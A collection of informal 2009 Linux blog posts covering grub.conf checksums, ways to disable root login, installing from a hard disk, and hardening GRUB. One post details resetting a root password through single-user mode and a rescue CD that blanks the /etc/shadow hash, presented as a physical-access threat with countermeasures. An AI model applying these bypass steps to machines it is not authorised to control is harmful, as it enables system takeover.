>openssl dgst -sha1 /boot/grub/grub.conf

If any one tampers grub, u will be informed (a shell script will do that which will compare previous checksum with present checksum).
openssl dgst is a flexible tool for generating message digest.
In place of grub path, it can be any file.
U may use -md5, -sha, -sha256, -md4, -md2, -ripemd160 algos etc in redhat, in place of -sha1. Of course u have seen -md5 digest, when u r downloading some files, software, OS etc. It is used to confirm that the file downloaded has not been tampered in between while downloading.

Ways of Disabling Linux-ROOT login!!

2009-12-21T11:50:00.000+05:30

If you wish to disable root login due to some security reasons or you wanna troubleshoot root login problem, here are some methods>>>>>

1.---------->
> Open the file /etc/passwd
> Append the line root:x:0:0:root:/root:/bin/bash to root:x:0:0:root:/root:/sbin/nologin
Root login is disabled now.
[It's self explainatory] Undo it for enabling.

2.----------->
> Change the rwx rights of file /etc/securetty to any value, other than 600(ie. rw-------). This file is tty login file.
Eg. chmod 644 /etc/securetty
Undo it by, chmod 600 /etc/securetty

3.----------->
> Open the file /etc/securetty
> Comment out the terminal using #, in which u wanna deny access to root.
Take a look at my /etc/securetty file
__________________________________________________
#tty1
tty2
tty3
#tty4
tty5
tty6
vc/1
vc/2
vc/3
vc/4
vc/5
vc/6
__________________________________________________

There are 6 cli terminals, which r marked as tty1,tty2 ........
You can enter those by pressing combination of Alt+Ctrl+f1, ie. for terminal 1, for terminal 2 replace f1 by f2 & so on for other terminals.
Press Alt+Ctrl+f7, for coming back to the gui.
After you comment out the terminal, u can't login to that terminal, it will display :login incorrect
(Undo by removing the hashes from file)

4.----------->
> Create a file in /etc directory by the name "nologin".
In this method, all users get blocked.
Eg. Execute command --> 'touch nologin' or 'cat nologin'

5.----------->
> Type the command --> 'chage -E 0 root'
This command just expires the root password....
Just try to observe the difference in the 1st line of file /etc/shadow, before & after the execution of the given command.

root:$1$K2oyDN17$GqkZQHsHtnxpwrFCG7AI91:14203:0:99 999:7:::

root:$1$K2oyDN17$GqkZQHsHtnxpwrFCG7AI91:14203:0:99 999:7::0:

Ya, you are right, there is a extra zero at the end. That stands for the days left, for your password expiry.
Undo it by issuing the command --> 'chage -E NEVER root' or 'chage -E 99999 root'
Issuing the last command will replace the 1st line of /etc/shadow to....

root:$1$K2oyDN17$GqkZQHsHtnxpwrFCG7AI91:14203:0:99 999:7::99999:

You can also do this by directly appending the file.

6------------->
Ok first, as root, you need to install sudo. Next, also as root, you need to edit the file /etc/sodoers. Add the following line --

Code:

username ALL=(ALL) ALL

replace username with the user you want to be able to access root permissions.
now to disable the root account --
as root type the following at the command prompt

Code:

passwd -l root

the -l flag will lock the root account. No longer will root logins be possible on your box. It is simple to get them back, you just need to do the following --

Code:

sudo passwd root yourpasswordhere

-------------X------------

Ofcourse, there are some more ways for blocking root login. But I don't wanna risk my PC, trying those now.
These methods works fine in Redhat & Mandriva, so these should work on other Linux OSs.
For troubleshooting, these conditions should be checked for correct settings.
If you get trapped, using these methods, try login at runlevel 1 at grub-menu or use rescue CD, as I suggested in the thread
"Securing ROOT password!!"

*****************************Have A Nice Day !!************************

Linux Installation from hard-disk!

2009-12-21T11:36:00.000+05:30

While installing linux, you might have seen the option -- installation form hard disk(internal or external), have you ever thought how that is done.
I wonder some of you might be knowing it but its not so popular i guess, though its very useful, saves you from writing DVDs & CDs & your time & money too. I found this 3 months ago.
Of course u require a OS pre-installed in your system.

Click on the link & follow the instruction .
http://www.instantfundas.com/2007/08/install-any-linux-distro-directly-from.html

There are two methods listed on the site, depending on your pre-installed system, whether it is windows or linux. If there are more than one linux OS installed in your system, then look for the OS whose grub menu appears at the boot time & apply the methods as mentioned in the site in that OS.

After you did the configurations as given in the site, you have to boot the system & the select the title that you just made while editing /boot/grub/menu.lst or /boot/grub/grub.conf for linux. After some basic configurations, you have to select installation method - choose from Hard-disk & then select the drive Partition & give the path of *.iso image.
I tried it 2 days ago, for me the path was /distro/suse1100.iso . (installing over linux)
after that, its a normal installation.

Securing ROOT password!!

2009-12-21T11:25:00.001+05:30

In case, u forget ur root password or u wanna access the system with root privileges without knowing root password, u can easily change it by following these steps >>>

> Boot ur PC.

> Switch to linux OS listed in the Grub menu & press e( in Redhat), if it doesn't works then press f2 (in Mandriva), or try any other option which is listed in the boot screen untill u see the booting parameters for that OS, like...
kernel (hd0,9)/vmlinuz BOOT_IMAGE=linux root=UUID=f39877a0-9a19-11dd-8a61-97b60b6e4958 resume=/dev/sda7 splash=verbose vga=788
(ie. for Mandriva )

>Edit it, press space & 1 at the end of the line, so that it becomes....
kernel (hd0,9)/vmlinuz BOOT_IMAGE=linux root=UUID=f39877a0-9a19-11dd-8a61-97b60b6e4958 resume=/dev/sda7 splash=verbose vga=788 1
now press b for or simply enter key.

>Now the OS boots to runlevel 1 (that is single user mode, only root is logged on & is used for maintenence purposes), & sh prompt appears.

>Type the command passwd & then enter

>Type your new password 2 times, it goes like this..
INIT:entering single user mode
sh3.2-#passwd
Changing password for user root.
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.

>Type exit & enter.

Now ur root password is changed, so u can see, how easy it is for someone to break ur root password.

So we will now try to block the way through which someone can change the boot parameters
Here r the steps >>

>Open the terminal..
Type command, grub-md5-crypt & press enter, then enter your desired password for grub menu 2 times.. it goes like this...
[root@localhost ~]# grub-md5-crypt
Password:
Retype password:
$1$fEY8n$JcQYHPGCuYkxxKupgaB6c0

> Now u can see that, some junk characters appear on ur terminal. Next u have to edit menu.lst (or grub.conf in Redhat)
Copy the junk characters (which is md5 encryption of ur grub password).
Execute vi /boot/grub/menu.lst
Now observe the file menu.lst if u can see the line "hidden menu" {I'm assuming, u r familiar with vi editor basics}
If it is there, then type below it "password --md5 $1$fEY8n$JcQYHPGCuYkxxKupgaB6c0".
Else type above the line "default i" (i >=0, any integer value, depends on which OS u wanna boot by default, starting from zero)
hiddden menu
password --md5 $1$fEY8n$JcQYHPGCuYkxxKupgaB6c0
**If u wanna lock a particular OS, type "lock" below the OS specification. The OS will be locked & for booting it, u have to enter the grub-password.
Take a look at my menu.lst>>>>
__________________________________________________ __________________________________________________ ___________________________
timeout 10
color black/cyan yellow/cyan
gfxmenu (hd0,9)/gfxmenu
splashimage=(hd0,9)/boot/grub/hubble.xpm.gz
hiddden menu
password --md5 $1$MWiym$3QLabLcVRSyVUYIRa1aKy/
default 0

title MANDRIVA-Linux
kernel (hd0,9)/vmlinuz BOOT_IMAGE=linux root=UUID=f39877a0-9a19-11dd-8a61-97b60b6e4958 resume=/dev/sda7 splash=verbose vga=788
initrd (hd0,9)/initrd.img

title linux-nonfb
kernel (hd0,9)/vmlinuz BOOT_IMAGE=linux-nonfb root=UUID=f39877a0-9a19-11dd-8a61-97b60b6e4958 resume=/dev/sda7
initrd (hd0,9)/initrd.img

title failsafe
kernel (hd0,9)/vmlinuz BOOT_IMAGE=failsafe root=UUID=f39877a0-9a19-11dd-8a61-97b60b6e4958 failsafe
initrd (hd0,9)/initrd.img

title Windows-VISTA
root (hd0,0)
makeactive
chainloader +1
lock

title Windows Recovery
root (hd0,3)
makeactive
chainloader +1
lock
__________________________________________________ __________________________________________________ ___________________________

Save & exit from menu.lst.

Now boot your pc & try to edit the boot parameters as you did in first section, grub-menu displays --enter p to unlock next set of features.
Press p, it will prompt for grub-password, after entering grub-password, u can edit booting parameters & enter the locked OS.
************************MISSION-------ACCOMPLISHED************************

Hey, its not over yet.....................
Your root password is still not safe..................

Insert your bootable linux cd/dvd (or rescue cd)......
Process may be very different for different linux distribution, so I'm just explaining it in a simple way.
Mount ur / drive to /mnt.
Type passwd & change ur root password or Open etc/shadow & delete the Encrypted root password.
Eg. Change the line..........
root:$1$JK9GUDoD$9WXbaXbYRm61C7WdI12KI.:14202:0:99 999:7::: to root::14202:0:99999:7:::
The root password is cleared.
Also delete the line --> password --md5 $1$MWiym$3QLabLcVRSyVUYIRa1aKy/ from menu.lst file for clearing the grub-password.
And reboot.

So a person with some experience in linux (with a rescue cd) can takeover ur less configured system..
So the threat of physical access by a individual can't be ignored....
U can still block him, by enabling BIOS password......(there may be other ways too.)

Moral of the story ------------> A Social Engineering attack may be Lethal.

I think, its quite knowledgeable for Linux-newbies.

Plz post ur suggestion, comments,corrections & feedback............

Thanx for reading such a big thread!!